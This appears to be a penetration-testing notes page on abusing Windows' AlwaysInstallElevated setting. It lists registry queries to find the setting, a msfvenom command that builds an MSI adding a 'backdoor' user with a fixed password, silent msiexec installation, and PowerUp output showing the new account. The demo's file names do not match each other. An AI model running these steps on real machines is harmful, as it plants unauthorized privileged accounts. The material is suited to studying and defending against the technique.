AlwaysInstallElevated

Overview

Manual enumeration

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer  

automatic enumeration

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

so how do i abuse it? sadly using msfvenom

kali@kali ~> msfvenom -p windows/adduser USER=backdoor PASS=Backdoor123# -f msi-nouac -o evil.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 278 bytes
Final size of msi-nouac file: 159744 bytes
Saved as: evil.msi

launch it using

msiexec /quiet /qn /i C:\evil.msi

Example

PS C:\Users\user\Desktop\Tools\PowerUp> ls


    Directory: C:\Users\user\Desktop\Tools\PowerUp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/30/2017   2:35 AM     562841 PowerUp.ps1


PS C:\Users\user\Desktop\Tools\PowerUp> . .\PowerUp.ps1
PS C:\Users\user\Desktop\Tools\PowerUp> Write-UserAddMSI

OutputPath
----------
UserAdd.msi


PS C:\Users\user\Desktop\Tools\PowerUp> ls


    Directory: C:\Users\user\Desktop\Tools\PowerUp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/30/2017   2:35 AM     562841 PowerUp.ps1
-a---         7/21/2024   4:29 PM     208896 UserAdd.msi


PS C:\Users\user\Desktop\Tools\PowerUp> msiexec /quiet /qn /i C:\evil.msi
PS C:\Users\user\Desktop\Tools\PowerUp>


C:\Users\backdoor>whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
pc\backdoor S-1-5-21-3825595215-1278258515-2096077417-1004


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes

====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544 Group usedfor deny only
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON  Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\backdoor>

Last updated